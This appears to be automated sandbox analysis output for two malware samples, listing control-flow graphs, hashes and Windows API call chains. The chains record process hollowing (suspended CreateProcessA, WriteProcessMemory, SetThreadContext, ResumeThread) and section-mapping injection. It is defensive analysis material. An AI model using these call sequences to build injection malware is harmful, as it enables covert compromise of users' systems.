                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_2600000_pZhQ7nTCR9R3A5r5QIQYLapT.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                                          • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                          • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                          • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                          • Instruction ID: 38970583c4b0d8f2029b469f18cb552b7e2e82059de27bbee9bf2002265f9962
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ED525974A01229DFDB64CF58C984BADBBB1BF09304F1480E9E54DAB391DB30AA95DF14

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 332 2600e0f-2600e24 SetErrorMode * 2 333 2600e26 332->333 334 2600e2b-2600e2c 332->334 333->334
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SetErrorMode.KERNELBASE(00000400,?,?,02600223,?,?), ref: 02600E19
                                                                                                                                                                                                                                          • SetErrorMode.KERNELBASE(00000000,?,?,02600223,?,?), ref: 02600E1E
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.2511522701.0000000002600000.00000040.00001000.00020000.00000000.sdmp, Offset: 02600000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_2600000_pZhQ7nTCR9R3A5r5QIQYLapT.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorMode
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2340568224-0
                                                                                                                                                                                                                                          • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                          • Instruction ID: f82a6827768bfc8aed8dcca7ece3f46dddec10a89304653ab261c17e36a96948
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 47D01232245228B7DB002A94DC09BCEBB1CDF09BA6F008021FB0DE9180CBB09A4046EA

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 335 4018e6-40194b call 401193 Sleep call 40141f 349 40195a-4019a5 call 401193 335->349 350 40194d-401955 call 401514 335->350 350->349
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                                                                                                                                            • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                                                                                                                            • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                                                                                                                            • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.2504777380.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_400000_pZhQ7nTCR9R3A5r5QIQYLapT.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1885482327-0
                                                                                                                                                                                                                                          • Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                                                                                                                                                                                                          • Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 364 401915-401918 365 4018c6-4018c7 364->365 366 40191a-40194b call 401193 Sleep call 40141f 364->366 367 4018d7 365->367 368 4018ce-4018e3 call 401193 365->368 378 40195a-4019a5 call 401193 366->378 379 40194d-401955 call 401514 366->379 367->368 379->378
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                                                                                                                                            • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                                                                                                                            • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                                                                                                                            • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.2504777380.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_400000_pZhQ7nTCR9R3A5r5QIQYLapT.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1885482327-0
                                                                                                                                                                                                                                          • Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                                                                                                                                                                                                          • Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 393 4018f1-40194b call 401193 Sleep call 40141f 403 40195a-4019a5 call 401193 393->403 404 40194d-401955 call 401514 393->404 404->403
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                                                                                                                                            • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                                                                                                                            • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                                                                                                                            • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.2504777380.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_400000_pZhQ7nTCR9R3A5r5QIQYLapT.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1885482327-0
                                                                                                                                                                                                                                          • Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                                                                                                                                                                                                          • Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 418 401912-40194b call 401193 Sleep call 40141f 429 40195a-4019a5 call 401193 418->429 430 40194d-401955 call 401514 418->430 430->429
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                                                                                                                                            • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                                                                                                                            • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                                                                                                                            • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.2504777380.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_400000_pZhQ7nTCR9R3A5r5QIQYLapT.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1885482327-0
                                                                                                                                                                                                                                          • Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                                                                                                                                                                                                          • Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 444 26d01b9-26d01f3 call 26d04cc 447 26d01f5-26d0228 VirtualAlloc call 26d0246 444->447 448 26d0241 444->448 450 26d022d-26d023f 447->450 448->448 450->448
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 026D020A
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.2521250191.00000000026BE000.00000040.00000020.00020000.00000000.sdmp, Offset: 026BE000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_26be000_pZhQ7nTCR9R3A5r5QIQYLapT.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                                                                          • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                          • Instruction ID: 678d1eb0738d91b83c256903a1d1db13e5a11693fb7f5e8c1811497a46dc8b79
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 02113C79A00208FFDB01DF98C985E99BBF5AF08350F058094F9489B361D371EA50DF84

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 451 401925-40194b call 401193 Sleep call 40141f 459 40195a-4019a5 call 401193 451->459 460 40194d-401955 call 401514 451->460 460->459
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                                                                                                                                            • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                                                                                                                                            • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                                                                                                                                            • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.2504777380.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_400000_pZhQ7nTCR9R3A5r5QIQYLapT.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1885482327-0
                                                                                                                                                                                                                                          • Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                                                                                                                                                                                                          • Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F

                                                                                                                                                                                                                                          Callgraph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          • Opacity -> Relevance
                                                                                                                                                                                                                                          • Disassembly available
                                                                                                                                                                                                                                          callgraph 0 Function_00D701D5 1 Function_00D700D4 2 Function_00D702D0 3 Function_00D704DF 4 Function_00D702DC 5 Function_00D708D9 6 Function_00D704C5 7 Function_00D702C4 8 Function_00D704C1 9 Function_00D701C0 10 Function_00D70AC9 11 Function_00D704C9 12 Function_00D700C8 13 Function_00D702F4 14 Function_00D700F0 15 Function_00D701F8 16 Function_00D1D0E1 17 Function_00D1D0E0 18 Function_00D700E4 19 Function_00D70BEF 20 Function_00D708E8 21 Function_00D702E8 22 Function_00D70495 23 Function_00D70491 24 Function_00D70090 25 Function_00D70390 26 Function_00D7029D 27 Function_00D7049D 28 Function_00D7039C 29 Function_027B2530 30 Function_027B2630 31 Function_00D70499 32 Function_00D70198 33 Function_00D70B98 33->19 34 Function_00D70485 35 Function_00D70384 36 Function_00D70284 37 Function_00D1D187 38 Function_00D70481 39 Function_00D70080 40 Function_00D7048D 41 Function_00D1D18C 42 Function_00D70489 43 Function_00D70188 44 Function_00D70988 92 Function_00D70510 44->92 93 Function_00D7051C 44->93 96 Function_00D70504 44->96 118 Function_00D70528 44->118 45 Function_027B2619 46 Function_00D704B4 47 Function_00D701B4 48 Function_00D702B4 49 Function_00D700B0 50 Function_00D700BC 51 Function_027B2809 52 Function_00D700A0 53 Function_00D701A8 54 Function_00D70557 55 Function_00D70154 56 Function_00D70054 57 Function_00D70254 58 Function_00D70354 59 Function_027B25FD 60 Function_00D70450 61 Function_00D1D059 62 Function_00D7045C 63 Function_00D70244 64 Function_00D70444 65 Function_00D70541 66 Function_027B25E0 67 Function_00D70148 68 Function_00D70848 69 Function_00D70348 70 Function_00D70B77 70->19 71 Function_00D70475 72 Function_00D70070 73 Function_027B24DC 74 Function_00D7047D 75 Function_00D70479 76 Function_00D70178 77 Function_00D70278 78 Function_00D70378 79 Function_00D70978 79->92 79->93 79->96 79->118 80 Function_00D1D163 81 Function_00D70165 82 Function_027B25C8 83 Function_00D70060 84 Function_00D70260 85 Function_00D70360 86 Function_00D70B60 87 Function_00D7026C 88 Function_00D7036C 89 Function_00D70468 90 Function_00D70214 91 Function_027B25B8 94 Function_00D7011C 95 Function_00D70318 97 Function_00D1D005 98 Function_00D70100 99 Function_00D70300 100 Function_00D7010C 101 Function_00D7030C 102 Function_027B21A5 103 Function_00D70208 104 Function_00D71108 105 Function_00D70535 106 Function_00D70434 107 Function_00D70234 108 Function_00D71031 109 Function_00D70330 110 Function_00D7053D 111 Function_00D7013C 112 Function_00D7033C 113 Function_00D70539 114 Function_00D70224 115 Function_00D70324 116 Function_027B258F 117 Function_00D7012C

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 027B2314
                                                                                                                                                                                                                                          • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 027B2327
                                                                                                                                                                                                                                          • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 027B2345
                                                                                                                                                                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 027B2369
                                                                                                                                                                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 027B2394
                                                                                                                                                                                                                                          • WriteProcessMemory.KERNELBASE(?,00000000,?,?,00000000,?), ref: 027B23EC
                                                                                                                                                                                                                                          • WriteProcessMemory.KERNELBASE(?,?,?,?,00000000,?,00000028), ref: 027B2437
                                                                                                                                                                                                                                          • WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 027B2475
                                                                                                                                                                                                                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 027B24B1
                                                                                                                                                                                                                                          • ResumeThread.KERNELBASE(?), ref: 027B24C0
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1739719895.00000000027B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 027B2000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_27b2000_RK8ajtyf9pvKlaXEo3EjTbnu.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                                                                                                                                                                          • String ID: GetP$Load$aryA$ress
                                                                                                                                                                                                                                          • API String ID: 2687962208-977067982
                                                                                                                                                                                                                                          • Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                                                                                                                                                                          • Instruction ID: 35acabfe5cf36df90b56014de3727f1e7a334ae092cdbe146845b6bef1b07ad3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 86B1D57664124AAFDB60CF68CC80BDA77A5FF88714F158124EA0CEB342D774FA418B94

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 23 d70bef-d70c57 26 d70c5d-d70c60 23->26 27 d70cf8-d70d06 23->27 30 d70c68-d70c76 26->30 28 d70dc2-d70dd8 27->28 29 d70d0c-d70d14 27->29 31 d70dde-d70dfc 28->31 32 d70f5c-d70f63 28->32 33 d70f66-d71006 VirtualProtect 29->33 34 d70d1a-d70d2d 29->34 30->33 43 d70c7c-d70cc7 30->43 35 d70e05-d70e10 31->35 36 d70dfe-d70e04 31->36 57 d7100d-d71021 33->57 58 d71008 33->58 34->33 37 d70d33-d70d3f 34->37 35->33 39 d70e16-d70e22 35->39 36->35 41 d70d41-d70d47 37->41 42 d70d48-d70d79 37->42 44 d70e24-d70e2a 39->44 45 d70e2b-d70e32 39->45 41->42 42->33 47 d70d7f-d70d89 42->47 43->33 49 d70ccd-d70cde 43->49 44->45 45->33 50 d70e38-d70e42 45->50 47->33 48 d70d8f-d70d99 47->48 48->33 51 d70d9f-d70da5 48->51 49->33 52 d70ce4-d70cf2 49->52 50->33 53 d70e48-d70e52 50->53 51->33 55 d70dab-d70dbc 51->55 52->26 52->27 53->33 56 d70e58-d70e5e 53->56 55->28 55->29 56->33 59 d70e64-d70e70 56->59 58->57 59->33 60 d70e76-d70e87 59->60 61 d70e90-d70f0f 60->61 62 d70e89-d70e8f 60->62 70 d70f25-d70f3c 61->70 71 d70f11-d70f1a 61->71 62->61 73 d70f47-d70f56 70->73 71->70 72 d70f1c-d70f23 71->72 72->73 73->31 73->32
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • VirtualProtect.KERNELBASE(037B3590,?,?,?,?,?,?,?,?,00000000,00000000,?,00D70A78,00000001,00000040), ref: 00D70FF9
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1706998492.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_d70000_RK8ajtyf9pvKlaXEo3EjTbnu.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                                                                          • String ID: &S!$<1i;
                                                                                                                                                                                                                                          • API String ID: 544645111-1770337207
                                                                                                                                                                                                                                          • Opcode ID: 549042ba0a8c58d548116eee26cda3deb95bb7e5f2e3356006c4b520cba2874f
                                                                                                                                                                                                                                          • Instruction ID: dc4bf93f1cf385bff8482613235b579deada30ddbe300c8ca63ba8682a2ddefa
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 549042ba0a8c58d548116eee26cda3deb95bb7e5f2e3356006c4b520cba2874f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5C16970A04259DFCB11CFA9C980AEDFBF1BF49310F64C599E458AB286D730AD45CBA4

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 75 d70988-d709f0 83 d70a02-d70a11 75->83 84 d709f2-d709fd call d70504 75->84 88 d70a13-d70a36 83->88 89 d70a41-d70a65 83->89 84->83 88->89 94 d70a67-d70a8a call d70510 89->94 95 d70ab9-d70acc 89->95 94->95 99 d70a8c-d70aa3 call d7051c 94->99 100 d70ace-d70b39 FreeConsole 95->100 101 d70b3b 95->101 104 d70aa8-d70ab8 call d70528 99->104 100->101 105 d70b40-d70b54 100->105 101->105
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1706998492.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_d70000_RK8ajtyf9pvKlaXEo3EjTbnu.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ConsoleFree
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 771614528-0
                                                                                                                                                                                                                                          • Opcode ID: 5353a8c91a80bd95cefc9e45c490c497e60b6703ae9ffe5ac01aeb5f9279b91b
                                                                                                                                                                                                                                          • Instruction ID: 64d14c6b87c13f89e6491198b4b7d8937bfe9c31fd87f83db391c566584befcc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5353a8c91a80bd95cefc9e45c490c497e60b6703ae9ffe5ac01aeb5f9279b91b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6251AB70A00348DFDB01EBA9D845B9EBBF1EF85310F14C569D1189B291EB74AA45CFA1

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 109 d71031-d71092 112 d71094-d710a0 109->112 113 d710a2-d710de CreateThread 109->113 112->113 114 d710e7-d710fb 113->114 115 d710e0-d710e6 113->115 115->114
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,?,00000000,?,?,?,?,?,00000000,00000000,?,00D70AA8,?,00000000,?), ref: 00D710D1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1706998492.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_d70000_RK8ajtyf9pvKlaXEo3EjTbnu.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateThread
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2422867632-0
                                                                                                                                                                                                                                          • Opcode ID: db527f35f0f99f95b8ef263c9a8da1cfb53e2e7522ab7b46bf9f1d691fdae0da
                                                                                                                                                                                                                                          • Instruction ID: cf594e2e81e697aeb2ed12a1253d143c9c3304c191f9f16c0a00b6a06af792b1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: db527f35f0f99f95b8ef263c9a8da1cfb53e2e7522ab7b46bf9f1d691fdae0da
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4021E2B59012499FCB10CF9AD984BDEBBF4FB49310F10842AE858A7350D375AA54CFA5

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 117 d7051c-d71092 120 d71094-d710a0 117->120 121 d710a2-d710de CreateThread 117->121 120->121 122 d710e7-d710fb 121->122 123 d710e0-d710e6 121->123 123->122
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateThread.KERNELBASE(00000000,00000000,?,00000000,?,?,?,?,?,00000000,00000000,?,00D70AA8,?,00000000,?), ref: 00D710D1
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1706998492.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_d70000_RK8ajtyf9pvKlaXEo3EjTbnu.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateThread
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2422867632-0
                                                                                                                                                                                                                                          • Opcode ID: 8f6948a4f737467e7cbf01faeeb54d6adeda7f976c999cb3a70c4c0d31167977
                                                                                                                                                                                                                                          • Instruction ID: 3dd53493f096879dd51a03cc2439efced97b285751981624a4804296d45ea4ed
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8f6948a4f737467e7cbf01faeeb54d6adeda7f976c999cb3a70c4c0d31167977
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9121F3B59013499FCB10CF9AD984BDEBBF4FB48310F10852AE858A7340D375AA54CFA5

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 125 d704df-d70b07 129 d70b0f-d70b39 FreeConsole 125->129 130 d70b40-d70b54 129->130 131 d70b3b 129->131 131->130
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1706998492.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_d70000_RK8ajtyf9pvKlaXEo3EjTbnu.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ConsoleFree
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 771614528-0
                                                                                                                                                                                                                                          • Opcode ID: 0c114d9144606b4ba0a01e017864587d0f1b653a5ecf7bc4926b4020e0a28516
